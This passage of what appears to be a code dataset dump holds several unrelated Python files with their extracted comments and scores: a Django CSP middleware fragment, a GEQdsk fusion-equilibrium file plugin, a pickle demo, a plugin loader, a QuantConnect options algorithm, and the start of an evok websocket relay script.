detailpage_uri = request.build_absolute_uri(reverse('result_detail', args=(session_id, )))
clientui_html = render_to_string("client_ui/popup.html", {
'session_id': session_id,
'visibility': app_settings.CLIENTUI_VISIBILITY,
'result_uri': result_uri,
'detailpage_uri': detailpage_uri
})
response.content = response.content.replace(b'</body>', str.encode(clientui_html + '</body>'))
return response
def __call__(self, request):
"""Checks current request path to decide if it should be observed or not."""
# check if path in enabled paths
for path_regex in self.paths_regex:
if path_regex.match(request.path):
self.logger.debug("match for path {}".format(request.path))
if app_settings.REMOTE_REPORTING:
session_id = str(uuid.uuid4())
self.logger.debug("creating remote session {}".format(session_id))
asyncio.run(create_master_session(request, session_id))
else:
session_id = self.create_session(request)
request.cspo_session_id = session_id
response = self.get_response(request)
response = self.add_csp_header(request, response, session_id)
response = self.add_tripwire(request, response, session_id)
response = self.add_clientui(request, response, session_id)
if app_settings.USE_SCRIPT_NONCE:
response = self.add_script_nonce(request, response)
if app_settings.USE_STYLE_NONCE:
response = self.add_style_nonce(request, response)
return response
return self.get_response(request) | en | 0.702383 | The main middleware that handles all of CSP-Observer's business logic. # compile regexes for all enabled paths # generate random lower case string Removes the last two octets from the ip_address. Creates a new session object, stores it in the database and returns the session id. Returns the CSP policy string based on the current settings. # set fallback reporting directive # New Reporting API stuff (not working?!): # https://w3c.github.io/reporting/ # response["Reporting-Endpoints"] = '{}="{}"'.format(self.reporting_group_name, report_uri) # merge custom csp policy from settings with required middleware directives # build csp header string Adds the CSP header to the response. Adds the CORS headers required for master reporting instances. Injects the tripwire javascript component into HTML response. Injects nonce attribute into all script tags in HTML response. Injects nonce attribute into all style and link tags in HTML response. Injects the clientui javascript component, responsible for the popup dialog, into HTML response. Checks current request path to decide if it should be observed or not. # check if path in enabled paths | 2.03427 | 2 |
python/spdm/plugins/data/file/PluginGEQdsk.py | simpla-fusion/spdb | 0 | 6613994 | <filename>python/spdm/plugins/data/file/PluginGEQdsk.py<gh_stars>0
import collections
import pathlib
import pprint
from functools import cached_property
import numpy as np
from spdm.common.logger import logger
from spdm.data.Node import Dict
from spdm.data.Entry import Entry, _next_
from spdm.data.File import File
def sp_read_geqdsk(file):
"""
:param file: input file / file path
:return: profile object
"""
description = file.read(48)
idum = int(file.read(4))
nw = int(file.read(4))
nh = int(file.read(4))
file.readline()
rdim = float(file.read(16))
zdim = float(file.read(16))
rcentr = float(file.read(16))
rleft = float(file.read(16))
zmid = float(file.read(16))
file.readline()
rmaxis = float(file.read(16))
zmaxis = float(file.read(16))
simag = float(file.read(16))
sibry = float(file.read(16))
bcentr = float(file.read(16))
file.readline()
current = float(file.read(16))
simag = float(file.read(16))
xdum = float(file.read(16))
rmaxis = float(file.read(16))
xdum = float(file.read(16))
file.readline()
zmaxis = float(file.read(16))
xdum = float(file.read(16))
sibry = float(file.read(16))
xdum = float(file.read(16))
xdum = float(file.read(16))
file.readline()
def _read_data(count, width=16):
data = []
for n in range(count):
data.append(float(file.read(width)))
if n >= count - 1 or ((n + 1) % 5 == 0):
file.readline()
data = np.asarray(data)
return data
#
fpol = _read_data(nw)
pres = _read_data(nw)
ffprim = _read_data(nw)
pprim = _read_data(nw)
psirz = _read_data(nw * nh).reshape([nh, nw])
qpsi = _read_data(nw)
try:
nbbs = int(file.read(5))
limitr = int(file.read(5))
file.readline()
bbsrz = _read_data(nbbs * 2).reshape([nbbs, 2])
limrz = _read_data(limitr * 2).reshape([limitr, 2])
except:
nbbs = 0
limitr = 0
bbsrz = None
limrz = None
data = {
"description": description,
# "idum": idum,
"nw": nw,
"nh": nh,
"rdim": rdim,
"zdim": zdim,
"rcentr": rcentr,
"rleft": rleft,
"zmid": zmid,
"rmaxis": rmaxis,
"zmaxis": zmaxis,
"simag": simag,
"sibry": sibry,
"bcentr": bcentr,
"current": current,
# "simag": simag,
# "rmaxis": rmaxis,
# "zmaxis": zmaxis,
# "sibry": sibry,
"fpol": fpol,
"pres": pres,
"ffprim": ffprim,
"pprim": pprim,
"psirz": psirz,
"qpsi": qpsi,
"bbsrz": bbsrz,
"limrz": limrz,
}
return data
def sp_write_geqdsk(p, file):
"""
:param profile: object
:param file: file path / file
:return:
"""
nw = p["nw"]
nh = p["nh"]
file.write("%48s%4i%4i%4i\n" % (p["description"], 3, p["nw"], p["nh"]))
file.write("%16.9e%16.9e%16.9e%16.9e%16.9e\n" %
(p["rdim"], p["zdim"], p["rcentr"], p["rleft"], p["zmid"]))
file.write("%16.9e%16.9e%16.9e%16.9e%16.9e\n" %
(p["rmaxis"], p["zmaxis"], p["simag"], p["sibry"], p["bcentr"]))
file.write("%16.9e%16.9e%16.9e%16.9e%16.9e\n" %
(p["current"], p["simag"], 0, p["rmaxis"], 0))
file.write("%16.9e%16.9e%16.9e%16.9e%16.9e\n" %
(p["zmaxis"], 0, p["sibry"], 0, 0))
def _write_data(d):
count = len(d)
for n in range(count):
file.write("%16.9e" % d[n])
if (n == count - 1) or ((n + 1) % 5 == 0):
file.write('\n')
_write_data(p["fpol"])
_write_data(p["pres"])
_write_data(p["ffprim"])
_write_data(p["pprim"])
_write_data(p["psirz"].reshape([nw * nh]))
_write_data(p["qpsi"])
file.write("%5i%5i\n" % (p["bbsrz"].shape[0], p["limrz"].shape[0]))
_write_data(p["bbsrz"].reshape([p["bbsrz"].size]))
_write_data(p["limrz"].reshape([p["limrz"].size]))
return
def sp_imas_equilibrium_to_geqdsk(eq, nw=125, nh=125):
from fytok.numlib import interpolate
coord_r = eq.coordinate_system.r
coord_z = eq.coordinate_system.z
rleft = coord_r.min()
rdim = coord_r.max() - coord_r.min()
zdim = coord_z.max() - coord_z.min()
# rdim = 0.0
# zdim = 0.0
rcentr = eq.boundary.geometric_axis.r
# rleft = 0.0
zmid = eq.boundary.geometric_axis.z
rmaxis = eq.global_quantities.magnetic_axis.r
zmaxis = eq.global_quantities.magnetic_axis.z
simag = eq.global_quantities.psi_axis
sibry = eq.global_quantities.psi_boundary
bcentr = eq.global_quantities.magnetic_axis.b_field_tor
current = eq.global_quantities.ip
# boundary
rbbs = eq.boundary.lcfs.r
zbbs = eq.boundary.lcfs.z
bbsrz = np.append(rbbs.reshape([1, rbbs.size]), zbbs.reshape(
[1, rbbs.size]), axis=0).transpose()
# psi
grid_r, grid_z = np.mgrid[rleft:rleft + rdim: nw *
1j, zmid - zdim / 2: zmid + zdim / 2: nh * 1j]
coord_r = np.append(coord_r[:, :], coord_r[:, 0].reshape(
coord_r.shape[0], 1), axis=1)
coord_z = np.append(coord_z[:, :], coord_z[:, 0].reshape(
coord_z.shape[0], 1), axis=1)
points = np.append(coord_r.reshape(
[coord_r.size, 1]), coord_z.reshape([coord_z.size, 1]), axis=1)
psi = eq.profiles_2d[1].psi
values = psi[:coord_r.shape[0], :coord_r.shape[1]].reshape(points.shape[0])
psirz = interpolate.griddata(
points, values, (grid_r, grid_z), method='cubic').transpose()
# profile
fpol = eq.profiles_1d.f
pres = eq.profiles_1d.pressure
ffprim = eq.profiles_1d.f_df_dpsi
pprim = eq.profiles_1d.dpressure_dpsi
qpsi = eq.profiles_1d.q
return {
"nw": nw,
"nh": nh,
"rdim": rdim,
"zdim": zdim,
"rcentr": rcentr,
"rleft": rleft,
"zmid": zmid,
"rmaxis": rmaxis,
"zmaxis": zmaxis,
"simag": simag,
"sibry": sibry,
"bcentr": bcentr,
"current": current,
"bbsrz": bbsrz,
"psirz": psirz,
"fpol": fpol,
"pres": pres,
"ffprim": ffprim,
"pprim": pprim,
"qpsi": qpsi
}
def sp_geqdsk_to_imas_equilibrium(geqdsk, eq: Dict = None) -> Dict:
if eq is None:
eq = Dict()
# eq.time = 0.0
eq["vacuum_toroidal_field.r0"] = geqdsk["rcentr"]
eq["vacuum_toroidal_field.b0"] = geqdsk["bcentr"]
# rleft = 0.0
eq["global_quantities.magnetic_axis.r"] = geqdsk["rmaxis"]
eq["global_quantities.magnetic_axis.z"] = geqdsk["zmaxis"]
# eq["global_quantities.magnetic_axis.b_field_tor"] = geqdsk["bcentr"]
eq["global_quantities.psi_axis"] = geqdsk["simag"]
eq["global_quantities.psi_boundary"] = geqdsk["sibry"]
eq["global_quantities.ip"] = geqdsk["current"]
# boundary
eq["boundary.outline.r"] = geqdsk["bbsrz"][:, 0]
eq["boundary.outline.z"] = geqdsk["bbsrz"][:, 1]
nw = geqdsk["nw"]
nh = geqdsk["nh"]
rmin = geqdsk["rleft"]
rmax = geqdsk["rleft"] + geqdsk["rdim"]
zmin = geqdsk["zmid"] - geqdsk["zdim"]/2
zmax = geqdsk["zmid"] + geqdsk["zdim"]/2
eq["profiles_2d.grid_type"] = "rectangular"
eq["profiles_2d.grid_index"] = 1
eq["profiles_2d.grid.dim1"] = np.linspace(rmin, rmax, nw)
eq["profiles_2d.grid.dim2"] = np.linspace(zmin, zmax, nh)
eq["profiles_2d.psi"] = geqdsk["psirz"].T
# profile
eq["profiles_1d.f"] = geqdsk["fpol"]
eq["profiles_1d.f_df_dpsi"] = geqdsk["ffprim"]
eq["profiles_1d.pressure"] = geqdsk["pres"]
eq["profiles_1d.dpressure_dpsi"] = geqdsk["pprim"]
eq["profiles_1d.q"] = geqdsk["qpsi"]
eq["profiles_1d.psi"] = np.linspace(geqdsk["simag"], geqdsk["sibry"], nw)
eq["profiles_1d.grid"] = {
"r0": geqdsk["rcentr"],
"b0": geqdsk["bcentr"],
"psi_norm": np.linspace(0, 1.0, nw),
"psi_axis": geqdsk["simag"],
"psi_boundary": geqdsk["sibry"],
}
return eq
class GEQdskFile(File):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
path = self.path
mode = self.mode_str
try:
self._fid = open(path, mode=mode)
except OSError as error:
raise FileExistsError(f"Can not open file {path}! {error}")
else:
logger.debug(f"Open File {path} mode={mode}")
def flush(self, *args, **kwargs):
if "x" in self.mode or "w" in self.mode:
self.save(self.path)
def read(self, lazy=False) -> Entry:
return sp_geqdsk_to_imas_equilibrium(sp_read_geqdsk(self._fid)).entry
def write(self, d):
geqdsk = sp_imas_equilibrium_to_geqdsk(d)
sp_write_geqdsk(geqdsk, self._fid)
__SP_EXPORT__ = GEQdskFile
| <filename>python/spdm/plugins/data/file/PluginGEQdsk.py<gh_stars>0
import collections
import pathlib
import pprint
from functools import cached_property
import numpy as np
from spdm.common.logger import logger
from spdm.data.Node import Dict
from spdm.data.Entry import Entry, _next_
from spdm.data.File import File
def sp_read_geqdsk(file):
"""
:param file: input file / file path
:return: profile object
"""
description = file.read(48)
idum = int(file.read(4))
nw = int(file.read(4))
nh = int(file.read(4))
file.readline()
rdim = float(file.read(16))
zdim = float(file.read(16))
rcentr = float(file.read(16))
rleft = float(file.read(16))
zmid = float(file.read(16))
file.readline()
rmaxis = float(file.read(16))
zmaxis = float(file.read(16))
simag = float(file.read(16))
sibry = float(file.read(16))
bcentr = float(file.read(16))
file.readline()
current = float(file.read(16))
simag = float(file.read(16))
xdum = float(file.read(16))
rmaxis = float(file.read(16))
xdum = float(file.read(16))
file.readline()
zmaxis = float(file.read(16))
xdum = float(file.read(16))
sibry = float(file.read(16))
xdum = float(file.read(16))
xdum = float(file.read(16))
file.readline()
def _read_data(count, width=16):
data = []
for n in range(count):
data.append(float(file.read(width)))
if n >= count - 1 or ((n + 1) % 5 == 0):
file.readline()
data = np.asarray(data)
return data
#
fpol = _read_data(nw)
pres = _read_data(nw)
ffprim = _read_data(nw)
pprim = _read_data(nw)
psirz = _read_data(nw * nh).reshape([nh, nw])
qpsi = _read_data(nw)
try:
nbbs = int(file.read(5))
limitr = int(file.read(5))
file.readline()
bbsrz = _read_data(nbbs * 2).reshape([nbbs, 2])
limrz = _read_data(limitr * 2).reshape([limitr, 2])
except:
nbbs = 0
limitr = 0
bbsrz = None
limrz = None
data = {
"description": description,
# "idum": idum,
"nw": nw,
"nh": nh,
"rdim": rdim,
"zdim": zdim,
"rcentr": rcentr,
"rleft": rleft,
"zmid": zmid,
"rmaxis": rmaxis,
"zmaxis": zmaxis,
"simag": simag,
"sibry": sibry,
"bcentr": bcentr,
"current": current,
# "simag": simag,
# "rmaxis": rmaxis,
# "zmaxis": zmaxis,
# "sibry": sibry,
"fpol": fpol,
"pres": pres,
"ffprim": ffprim,
"pprim": pprim,
"psirz": psirz,
"qpsi": qpsi,
"bbsrz": bbsrz,
"limrz": limrz,
}
return data
def sp_write_geqdsk(p, file):
"""
:param profile: object
:param file: file path / file
:return:
"""
nw = p["nw"]
nh = p["nh"]
file.write("%48s%4i%4i%4i\n" % (p["description"], 3, p["nw"], p["nh"]))
file.write("%16.9e%16.9e%16.9e%16.9e%16.9e\n" %
(p["rdim"], p["zdim"], p["rcentr"], p["rleft"], p["zmid"]))
file.write("%16.9e%16.9e%16.9e%16.9e%16.9e\n" %
(p["rmaxis"], p["zmaxis"], p["simag"], p["sibry"], p["bcentr"]))
file.write("%16.9e%16.9e%16.9e%16.9e%16.9e\n" %
(p["current"], p["simag"], 0, p["rmaxis"], 0))
file.write("%16.9e%16.9e%16.9e%16.9e%16.9e\n" %
(p["zmaxis"], 0, p["sibry"], 0, 0))
def _write_data(d):
count = len(d)
for n in range(count):
file.write("%16.9e" % d[n])
if (n == count - 1) or ((n + 1) % 5 == 0):
file.write('\n')
_write_data(p["fpol"])
_write_data(p["pres"])
_write_data(p["ffprim"])
_write_data(p["pprim"])
_write_data(p["psirz"].reshape([nw * nh]))
_write_data(p["qpsi"])
file.write("%5i%5i\n" % (p["bbsrz"].shape[0], p["limrz"].shape[0]))
_write_data(p["bbsrz"].reshape([p["bbsrz"].size]))
_write_data(p["limrz"].reshape([p["limrz"].size]))
return
def sp_imas_equilibrium_to_geqdsk(eq, nw=125, nh=125):
from fytok.numlib import interpolate
coord_r = eq.coordinate_system.r
coord_z = eq.coordinate_system.z
rleft = coord_r.min()
rdim = coord_r.max() - coord_r.min()
zdim = coord_z.max() - coord_z.min()
# rdim = 0.0
# zdim = 0.0
rcentr = eq.boundary.geometric_axis.r
# rleft = 0.0
zmid = eq.boundary.geometric_axis.z
rmaxis = eq.global_quantities.magnetic_axis.r
zmaxis = eq.global_quantities.magnetic_axis.z
simag = eq.global_quantities.psi_axis
sibry = eq.global_quantities.psi_boundary
bcentr = eq.global_quantities.magnetic_axis.b_field_tor
current = eq.global_quantities.ip
# boundary
rbbs = eq.boundary.lcfs.r
zbbs = eq.boundary.lcfs.z
bbsrz = np.append(rbbs.reshape([1, rbbs.size]), zbbs.reshape(
[1, rbbs.size]), axis=0).transpose()
# psi
grid_r, grid_z = np.mgrid[rleft:rleft + rdim: nw *
1j, zmid - zdim / 2: zmid + zdim / 2: nh * 1j]
coord_r = np.append(coord_r[:, :], coord_r[:, 0].reshape(
coord_r.shape[0], 1), axis=1)
coord_z = np.append(coord_z[:, :], coord_z[:, 0].reshape(
coord_z.shape[0], 1), axis=1)
points = np.append(coord_r.reshape(
[coord_r.size, 1]), coord_z.reshape([coord_z.size, 1]), axis=1)
psi = eq.profiles_2d[1].psi
values = psi[:coord_r.shape[0], :coord_r.shape[1]].reshape(points.shape[0])
psirz = interpolate.griddata(
points, values, (grid_r, grid_z), method='cubic').transpose()
# profile
fpol = eq.profiles_1d.f
pres = eq.profiles_1d.pressure
ffprim = eq.profiles_1d.f_df_dpsi
pprim = eq.profiles_1d.dpressure_dpsi
qpsi = eq.profiles_1d.q
return {
"nw": nw,
"nh": nh,
"rdim": rdim,
"zdim": zdim,
"rcentr": rcentr,
"rleft": rleft,
"zmid": zmid,
"rmaxis": rmaxis,
"zmaxis": zmaxis,
"simag": simag,
"sibry": sibry,
"bcentr": bcentr,
"current": current,
"bbsrz": bbsrz,
"psirz": psirz,
"fpol": fpol,
"pres": pres,
"ffprim": ffprim,
"pprim": pprim,
"qpsi": qpsi
}
def sp_geqdsk_to_imas_equilibrium(geqdsk, eq: Dict = None) -> Dict:
if eq is None:
eq = Dict()
# eq.time = 0.0
eq["vacuum_toroidal_field.r0"] = geqdsk["rcentr"]
eq["vacuum_toroidal_field.b0"] = geqdsk["bcentr"]
# rleft = 0.0
eq["global_quantities.magnetic_axis.r"] = geqdsk["rmaxis"]
eq["global_quantities.magnetic_axis.z"] = geqdsk["zmaxis"]
# eq["global_quantities.magnetic_axis.b_field_tor"] = geqdsk["bcentr"]
eq["global_quantities.psi_axis"] = geqdsk["simag"]
eq["global_quantities.psi_boundary"] = geqdsk["sibry"]
eq["global_quantities.ip"] = geqdsk["current"]
# boundary
eq["boundary.outline.r"] = geqdsk["bbsrz"][:, 0]
eq["boundary.outline.z"] = geqdsk["bbsrz"][:, 1]
nw = geqdsk["nw"]
nh = geqdsk["nh"]
rmin = geqdsk["rleft"]
rmax = geqdsk["rleft"] + geqdsk["rdim"]
zmin = geqdsk["zmid"] - geqdsk["zdim"]/2
zmax = geqdsk["zmid"] + geqdsk["zdim"]/2
eq["profiles_2d.grid_type"] = "rectangular"
eq["profiles_2d.grid_index"] = 1
eq["profiles_2d.grid.dim1"] = np.linspace(rmin, rmax, nw)
eq["profiles_2d.grid.dim2"] = np.linspace(zmin, zmax, nh)
eq["profiles_2d.psi"] = geqdsk["psirz"].T
# profile
eq["profiles_1d.f"] = geqdsk["fpol"]
eq["profiles_1d.f_df_dpsi"] = geqdsk["ffprim"]
eq["profiles_1d.pressure"] = geqdsk["pres"]
eq["profiles_1d.dpressure_dpsi"] = geqdsk["pprim"]
eq["profiles_1d.q"] = geqdsk["qpsi"]
eq["profiles_1d.psi"] = np.linspace(geqdsk["simag"], geqdsk["sibry"], nw)
eq["profiles_1d.grid"] = {
"r0": geqdsk["rcentr"],
"b0": geqdsk["bcentr"],
"psi_norm": np.linspace(0, 1.0, nw),
"psi_axis": geqdsk["simag"],
"psi_boundary": geqdsk["sibry"],
}
return eq
class GEQdskFile(File):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
path = self.path
mode = self.mode_str
try:
self._fid = open(path, mode=mode)
except OSError as error:
raise FileExistsError(f"Can not open file {path}! {error}")
else:
logger.debug(f"Open File {path} mode={mode}")
def flush(self, *args, **kwargs):
if "x" in self.mode or "w" in self.mode:
self.save(self.path)
def read(self, lazy=False) -> Entry:
return sp_geqdsk_to_imas_equilibrium(sp_read_geqdsk(self._fid)).entry
def write(self, d):
geqdsk = sp_imas_equilibrium_to_geqdsk(d)
sp_write_geqdsk(geqdsk, self._fid)
__SP_EXPORT__ = GEQdskFile
| en | 0.576307 | :param file: input file / file path :return: profile object # # "idum": idum, # "simag": simag, # "rmaxis": rmaxis, # "zmaxis": zmaxis, # "sibry": sibry, :param profile: object :param file: file path / file :return: # rdim = 0.0 # zdim = 0.0 # rleft = 0.0 # boundary # psi # profile # eq.time = 0.0 # rleft = 0.0 # eq["global_quantities.magnetic_axis.b_field_tor"] = geqdsk["bcentr"] # boundary # profile | 2.08487 | 2 |
Python Files/pickle1.py | Nmane1612/Nihar-Mane | 3 | 6613995 | <filename>Python Files/pickle1.py<gh_stars>1-10
import pickle
class Human:
def __init__(self):
self.name=input("Enter your name : ")
self.age=input("Enter your age : ")
def disp(self):
print("Hello {}, You are {} year old!".format(self.name,self.age))
with open("Human.dat", "wb") as f:
insaan=Human()
pickle.dump(insaan,f)
#f.seek(0,0)
with open("Human.dat", "rb") as f:
try:
maanav=pickle.load(f)
maanav.disp()
print(maanav.name)
except EOFError:
print("Done with object")
| <filename>Python Files/pickle1.py<gh_stars>1-10
import pickle
class Human:
def __init__(self):
self.name=input("Enter your name : ")
self.age=input("Enter your age : ")
def disp(self):
print("Hello {}, You are {} year old!".format(self.name,self.age))
with open("Human.dat", "wb") as f:
insaan=Human()
pickle.dump(insaan,f)
#f.seek(0,0)
with open("Human.dat", "rb") as f:
try:
maanav=pickle.load(f)
maanav.disp()
print(maanav.name)
except EOFError:
print("Done with object")
| es | 0.390157 | #f.seek(0,0) | 3.419217 | 3 |
project/plugin.py | Signiant/External-user-provisioning | 0 | 6613996 | <filename>project/plugin.py
import ast
import imp,os
import site
pluginFolder = site.getsitepackages()[0] +"/project/plugins"
if not os.path.isdir(pluginFolder):
print("\nThe path to the plugin folder is incorrect: " + site.getsitepackages()[0] +"/project/plugins")
raise SystemExit
else:
mainFile = "__init__"
def getAllPlugins():
plugins = []
possibleplugins = os.listdir(pluginFolder)
for i in possibleplugins:
location = os.path.join(pluginFolder, i)
if not os.path.isdir(location) or not mainFile + ".py" in os.listdir(location):
continue
info = imp.find_module(mainFile, [location])
plugins.append({"name": i, "info": info})
return plugins
def loadPlugin(pluginName):
try:
return imp.load_source(pluginName, os.path.join(pluginFolder, pluginName, mainFile + ".py"))
except FileNotFoundError:
return imp.load_source(pluginName, os.path.join(pluginFolder, pluginName, mainFile + ".py"))
def getApiToken(configMap,plugin_tag):
for plugin in configMap['plugins']:
if plugin['plugin']+':'+plugin['tag'] == plugin_tag:
return plugin['ApiToken']
def getUrl(configMap,plugin_tag):
for plugin in configMap['plugins']:
if plugin['plugin']+':'+plugin['tag'] == plugin_tag:
return plugin['url']
def getPermissions(configMap, plugin_tag):
for plugin in configMap['plugins']:
if plugin['plugin']+':'+plugin['tag'] == plugin_tag:
return plugin['permission']
def getGroups(configMap,plugin_tag):
groupsList=[]
for plugin in configMap['plugins']:
if plugin['plugin']+':'+plugin['tag']==plugin_tag:
groupsList=plugin['permission']['groups']
return groupsList
def inviteMessage(configMap,plugin_tag):
for plugin in configMap['plugins']:
if plugin['plugin']+':'+plugin['tag'] == plugin_tag:
return plugin['message_invite']
def removalMessage(configMap,plugin_tag):
for plugin in configMap['plugins']:
if plugin['plugin']+':'+plugin['tag'] == plugin_tag:
return plugin['message_remove']
def getCLIgroups(configMap, plugin_tag, allPermissions):
cli_groups = []
for permission in allPermissions:
thisPermissions = ast.literal_eval(permission)
if thisPermissions['plugin'] == plugin_tag:
del thisPermissions['plugin']
return list(thisPermissions.values())
if len(cli_groups) == 0:
return getGroups(configMap, plugin_tag) | <filename>project/plugin.py
import ast
import imp,os
import site
pluginFolder = site.getsitepackages()[0] +"/project/plugins"
if not os.path.isdir(pluginFolder):
print("\nThe path to the plugin folder is incorrect: " + site.getsitepackages()[0] +"/project/plugins")
raise SystemExit
else:
mainFile = "__init__"
def getAllPlugins():
plugins = []
possibleplugins = os.listdir(pluginFolder)
for i in possibleplugins:
location = os.path.join(pluginFolder, i)
if not os.path.isdir(location) or not mainFile + ".py" in os.listdir(location):
continue
info = imp.find_module(mainFile, [location])
plugins.append({"name": i, "info": info})
return plugins
def loadPlugin(pluginName):
try:
return imp.load_source(pluginName, os.path.join(pluginFolder, pluginName, mainFile + ".py"))
except FileNotFoundError:
return imp.load_source(pluginName, os.path.join(pluginFolder, pluginName, mainFile + ".py"))
def getApiToken(configMap,plugin_tag):
for plugin in configMap['plugins']:
if plugin['plugin']+':'+plugin['tag'] == plugin_tag:
return plugin['ApiToken']
def getUrl(configMap,plugin_tag):
for plugin in configMap['plugins']:
if plugin['plugin']+':'+plugin['tag'] == plugin_tag:
return plugin['url']
def getPermissions(configMap, plugin_tag):
for plugin in configMap['plugins']:
if plugin['plugin']+':'+plugin['tag'] == plugin_tag:
return plugin['permission']
def getGroups(configMap,plugin_tag):
groupsList=[]
for plugin in configMap['plugins']:
if plugin['plugin']+':'+plugin['tag']==plugin_tag:
groupsList=plugin['permission']['groups']
return groupsList
def inviteMessage(configMap,plugin_tag):
for plugin in configMap['plugins']:
if plugin['plugin']+':'+plugin['tag'] == plugin_tag:
return plugin['message_invite']
def removalMessage(configMap,plugin_tag):
for plugin in configMap['plugins']:
if plugin['plugin']+':'+plugin['tag'] == plugin_tag:
return plugin['message_remove']
def getCLIgroups(configMap, plugin_tag, allPermissions):
cli_groups = []
for permission in allPermissions:
thisPermissions = ast.literal_eval(permission)
if thisPermissions['plugin'] == plugin_tag:
del thisPermissions['plugin']
return list(thisPermissions.values())
if len(cli_groups) == 0:
return getGroups(configMap, plugin_tag) | none | 1 | 2.539265 | 3 | |
SaigeIncPythonExamples/SaigeIncPythonExamples.py | Synchronicity89/Lean | 0 | 6613997 | <reponame>Synchronicity89/Lean<gh_stars>0
from clr import AddReference
AddReference("System")
AddReference("QuantConnect.Algorithm")
AddReference("QuantConnect.Common")
from System import *
from QuantConnect import *
from QuantConnect.Algorithm import *
from datetime import timedelta
### <summary>
### This example demonstrates how to add options for a given underlying equity security.
### It also shows how you can prefilter contracts easily based on strikes and expirations, and how you
### can inspect the option chain to pick a specific option contract to trade.
### </summary>
### <meta name="tag" content="using data" />
### <meta name="tag" content="options" />
### <meta name="tag" content="filter selection" />
class BasicTemplateOptionsAlgorithm(QCAlgorithm):
def Initialize(self):
self.SetStartDate(2016, 1, 1)
self.SetEndDate(2016, 1, 10)
self.SetCash(100000)
option = self.AddOption("GOOG")
self.option_symbol = option.Symbol
# set our strike/expiry filter for this option chain
option.SetFilter(-2, +2, timedelta(0), timedelta(180))
# use the underlying equity as the benchmark
self.SetBenchmark("GOOG")
def OnData(self,slice):
if self.Portfolio.Invested: return
for kvp in slice.OptionChains:
if kvp.Key != self.option_symbol: continue
chain = kvp.Value
# we sort the contracts to find at the money (ATM) contract with farthest expiration
contracts = sorted(sorted(sorted(chain, \
key = lambda x: abs(chain.Underlying.Price - x.Strike)), \
key = lambda x: x.Expiry, reverse=True), \
key = lambda x: x.Right, reverse=True)
# if found, trade it
if len(contracts) == 0: continue
symbol = contracts[0].Symbol
self.MarketOrder(symbol, 1)
self.MarketOnCloseOrder(symbol, -1)
def OnOrderEvent(self, orderEvent):
self.Log(str(orderEvent))
| from clr import AddReference
AddReference("System")
AddReference("QuantConnect.Algorithm")
AddReference("QuantConnect.Common")
from System import *
from QuantConnect import *
from QuantConnect.Algorithm import *
from datetime import timedelta
### <summary>
### This example demonstrates how to add options for a given underlying equity security.
### It also shows how you can prefilter contracts easily based on strikes and expirations, and how you
### can inspect the option chain to pick a specific option contract to trade.
### </summary>
### <meta name="tag" content="using data" />
### <meta name="tag" content="options" />
### <meta name="tag" content="filter selection" />
class BasicTemplateOptionsAlgorithm(QCAlgorithm):
def Initialize(self):
self.SetStartDate(2016, 1, 1)
self.SetEndDate(2016, 1, 10)
self.SetCash(100000)
option = self.AddOption("GOOG")
self.option_symbol = option.Symbol
# set our strike/expiry filter for this option chain
option.SetFilter(-2, +2, timedelta(0), timedelta(180))
# use the underlying equity as the benchmark
self.SetBenchmark("GOOG")
def OnData(self,slice):
if self.Portfolio.Invested: return
for kvp in slice.OptionChains:
if kvp.Key != self.option_symbol: continue
chain = kvp.Value
# we sort the contracts to find at the money (ATM) contract with farthest expiration
contracts = sorted(sorted(sorted(chain, \
key = lambda x: abs(chain.Underlying.Price - x.Strike)), \
key = lambda x: x.Expiry, reverse=True), \
key = lambda x: x.Right, reverse=True)
# if found, trade it
if len(contracts) == 0: continue
symbol = contracts[0].Symbol
self.MarketOrder(symbol, 1)
self.MarketOnCloseOrder(symbol, -1)
def OnOrderEvent(self, orderEvent):
self.Log(str(orderEvent)) | en | 0.770733 | ### <summary> ### This example demonstrates how to add options for a given underlying equity security. ### It also shows how you can prefilter contracts easily based on strikes and expirations, and how you ### can inspect the option chain to pick a specific option contract to trade. ### </summary> ### <meta name="tag" content="using data" /> ### <meta name="tag" content="options" /> ### <meta name="tag" content="filter selection" /> # set our strike/expiry filter for this option chain # use the underlying equity as the benchmark # we sort the contracts to find at the money (ATM) contract with farthest expiration # if found, trade it | 2.63196 | 3 |
class_3/supportlib.py | goosemanjack/python_intro_class | 0 | 6613998 |
def one():
return "This is the function one"
def two():
return "This is what comes from calling two"
|
def one():
return "This is the function one"
def two():
return "This is what comes from calling two"
| none | 1 | 2.259972 | 2 | |
library/lidar/setup.py | Hitachi-CTI-Call-For-Code-COVID-19-Team/edge-data-collector | 0 | 6613999 | <gh_stars>0
import setuptools
setuptools.setup(
name="lidar",
version="0.1.2",
author="<NAME>",
author_email="<EMAIL>",
description="LiDAR (ToF) controller for TFmini/TFmini plus",
long_description="This package provides LiDAR (ToF) controller for TFmini/TFmini plus.",
long_description_content_type="text/markdown",
url="",
packages=setuptools.find_packages(),
install_requires=[
],
classifiers=[
"Programming Language :: Python :: 3.7.3",
"License :: OSI Approved :: Apache License, Version 2.0",
"Operating System :: OS Independent",
]
)
| import setuptools
setuptools.setup(
name="lidar",
version="0.1.2",
author="<NAME>",
author_email="<EMAIL>",
description="LiDAR (ToF) controller for TFmini/TFmini plus",
long_description="This package provides LiDAR (ToF) controller for TFmini/TFmini plus.",
long_description_content_type="text/markdown",
url="",
packages=setuptools.find_packages(),
install_requires=[
],
classifiers=[
"Programming Language :: Python :: 3.7.3",
"License :: OSI Approved :: Apache License, Version 2.0",
"Operating System :: OS Independent",
]
) | none | 1 | 1.093816 | 1 | |
examples/python/websocket3.py | wimstockman/evok | 0 | 6614000 | #############################################################################################################################
# Example 3: Basic websocket application to interact with evok api #
# Extension of the second example websocket2 #
# Adding a Long Press Button Event: #
# I implemented this on the client side #
# We start a Timer (longpress timer) on a button press #
# If the button is not released in 3 second we turn off all relays #
# We achieve this to check inside the timer function if the long press is still active after 3s #
# If the button is released before the 3 seconds are done we receive a message from the server #
# signaling the button is released by sending a bitvalue of 0 #
# if we receive this message we set the long_press_button_active = 0 #
# and we set the long_press_timer = 0 so our Timer exits #
# #
# #
# #
# #
# Example create by <NAME> #
# On 2019-05-15 #
#############################################################################################################################
import websocket
import time
import json
from threading import Thread
def dprint(e):
debug = 1
if debug:
print(e)
class myhome():
def __init__(self):
#define in 1/10 of seconds
self.WAITTIME = 20
self.long_press_timer_countdown = 0
self.long_press_button_active = 0
self.Timer = None
self.toggle_relay = 0
self.di_relay_dict = {'1':'allon','2':'2','3':'3','4':'4','5':'5','6':'6','7':'7','8':'8'}
self.ws = websocket.WebSocketApp("ws://localhost/ws",
